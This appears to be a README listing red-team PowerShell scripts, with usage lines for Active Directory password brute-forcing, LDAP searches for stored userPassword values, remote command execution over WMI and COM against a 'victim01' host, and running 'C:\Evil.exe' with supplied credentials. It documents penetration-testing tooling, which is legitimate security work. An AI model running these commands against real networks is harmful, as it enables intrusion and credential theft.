Red Team Powershell Scripts: PowerShell scripts for Red Team
Red Team Powershell Scripts
- Search-EventForUser.ps1: Powershell script that searches through the Windows event logs for a specific user(s)
Usage:
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser “MrUn1k0d3r”
module-import .\Search-EventForUser.ps1; “MrUn1k0d3r” | Search-EventForUser
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
module-import .\Search-EventForUser.ps1; “god”, “mom” | Search-EventForUser -FindDC true
module-import .\Search-EventForUser.ps1; “god”, “mom” | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password “123456”
The -User parameter support a single user or a list of users from a pipeline
- Search-FullNameToSamAccount.ps1: Full name to SamAccountName
Usage:
module-import .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
module-import .\Search-FullNameToSamAccount.ps1; “god”, “mom” | Search-FullNameToSamAccount
- Search-UserPassword.ps1: Search LDAP for userPassword field
Usage:
module-import .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
module-import .\Search-UserPassword.ps1; “god”, “mom” | Search-UserPassword
- Remote-WmiExecute.ps1: Execute command remotely using WMI
Usage:
module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload “cmd.exe /c whoami”
- Take-Screenshot.ps1: Take a screenshot (PNG)
Usage:
module-import .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png
- Get-BrowserHomepage.ps1: Get browser homepage
Usage:
module-import .\Get-BrowserHomepage.ps1; Get-BrowserHomepage
- Get-IEBookmarks.ps1: List all Internet Explorer bookmarks URLs
module-import .\Get-IEBookmarks.ps1; Get-IEBookmarks
- Invoke-ADPasswordBruteForce.ps1: Test users password
module-import .\Invoke-ADPasswordBruteForce; Invoke-ADPasswordBruteForce -Username “mr.un1k0d3r” -Password “password”
module-import .\Invoke-ADPasswordBruteForce; “neo”,”morpheus” | Invoke-ADPasswordBruteForce -Password “password”
module-import .\Invoke-ADPasswordBruteForce; “neo”,”morpheus” | Invoke-ADPasswordBruteForce -Password “password” -Domain MATRIX
- Remote-COMShellExec.ps1
module-import .\Remote-COMShellExec.ps1; Remote-COMShellExec -ComputerName 192.168.1.1 -Command “cmd.exe” -Argument “/c whoami”
- Utility.ps1:Contain de following cmdlets
Search-EventForUser
Search-FullNameToSamAccount
Ldap-GetProperty
Search-UserPassword
Dump-UserEmail
Dump-Computers
Dump-UserName
- Run-As.ps1: Run a process as another user (credentials)
module-import .\Run-As.ps1; Run-As -Username RingZer0\Mr.Un1k0d3r -Password “IShouldNotLeakThisPasswordOnTheInternet” -Process “C:\Evil.exe”
- COM-Utility.ps1: Contain several cmdletsContain de following cmdlets
Invoke-COM-ScheduleService
Invoke-COM-XMLHTTP
Invoke-COM-ShellBrowserWindow
Invoke-COM-WindowsScriptHost
Invoke-COM-ProcessChain
Invoke-COM-ShellApplication